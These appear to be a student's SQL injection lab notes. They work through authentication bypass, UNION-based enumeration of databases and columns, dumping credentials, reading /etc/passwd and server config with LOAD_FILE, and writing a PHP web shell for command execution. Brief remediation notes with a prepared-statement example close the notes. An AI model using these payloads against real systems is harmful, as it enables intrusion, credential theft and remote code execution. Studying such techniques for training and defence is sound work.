SQLi

// solving auth
some' OR id=5)-- 

logged in as superadmin

// Unions
SELECT * FROM ports UNION SELECT * FROM ships;
SELECT * from products where product_id = '1' UNION SELECT username, password from passwords-- '

For advanced SQL injection, we may want to simply use 'NULL' to fill other columns, 
as 'NULL' fits all data types.

mysql -u root -h 94.237.62.195 -P 54954

// detecting number of columns
Using ORDER BY
ORDER BY 1... ORDER BY 2 until we get an error saying the column specified doesn't exist

' order by 1-- -
' order by 2-- -
// other method using UNION

cn' UNION select 1,2,3-- -
// we get an error saying that the number of columns doesn't match

cn' UNION select 1,2,3,4-- -
// get DB version
cn' UNION select 1,@@version,3,4-- -

cn' UNION select 1,2,user(),4-- -

// find what Databases avail on the system
SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA;

cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -

// find current DB
cn' UNION select 1,database(),2,3-- -

// other DB seems interesting
// find tables within Dev DB
cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -

Note how we replaced the numbers '2' and '3' with 'TABLE_NAME' and 'TABLE_SCHEMA', to get the output of both columns in the same query.

// find columns
cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -

// dump data
cn' UNION select 1, username, password, 4 from dev.credentials-- -

don't forget to use the dot operator to refer to the 'credentials' in the 'dev' database,
 as we are running in the 'ilfreight' database, as previously discussed.

cn' UNION select 1,username,password,4 from ilfreight.users-- -

// find which user we are
cn' UNION SELECT 1, user(), 3, 4-- -
cn' UNION SELECT 1, user, 3, 4 from mysql.user-- -
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user-- -

// if we had many users
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -

// dump other privileges
cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges-- -

// only perform dump for root
cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- -

// read file
cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -

//To be able to write files to the back-end server using a MySQL database,
// we require three things:

1 User with FILE privilege enabled
2 MySQL global secure_file_priv variable not enabled
3 Write access to the location we want to write to on the back-end server

cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -

// finding webroot
https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-linux.txt
// windows:
https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-windows.txt

cn' union select 1,'file written successfully!',3,4 into outfile '/var/www/html/proof.txt'-- -

// shell time
cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -

// execute using shell.php?0=id
shell.php?0=find / -name flag*

// remediation
Input Sanitization, input validation (regex), user privileges, parameterized queries, WAF
CREATE USER 'reader'@'localhost';
GRANT SELECT ON ilfreight.ports TO 'reader'@'localhost' IDENTIFIED BY 'p@ssw0Rd!!';


<SNIP>
  $username = $_POST['username'];
  $password = $_POST['password'];

  $query = "SELECT * FROM logins WHERE username=? AND password = ?" ;
  $stmt = mysqli_prepare($conn, $query);
  mysqli_stmt_bind_param($stmt, 'ss', $username, $password);
  mysqli_stmt_execute($stmt);
  $result = mysqli_stmt_get_result($stmt);

  $row = mysqli_fetch_array($result);
  mysqli_stmt_close($stmt);
<SNIP>


// last assess
' or 1=1-- -
' union SELECT @@vERSION,2,3,4,5-- -
' union SELECT 1,@@vERSION,2,3,4-- -


search=TEST%27+union+SELECT+1%2Cload_file%28%22%2Fetc%2Fapache2%2Fapache2.conf%22%29%2C3%2C4%2C5--+-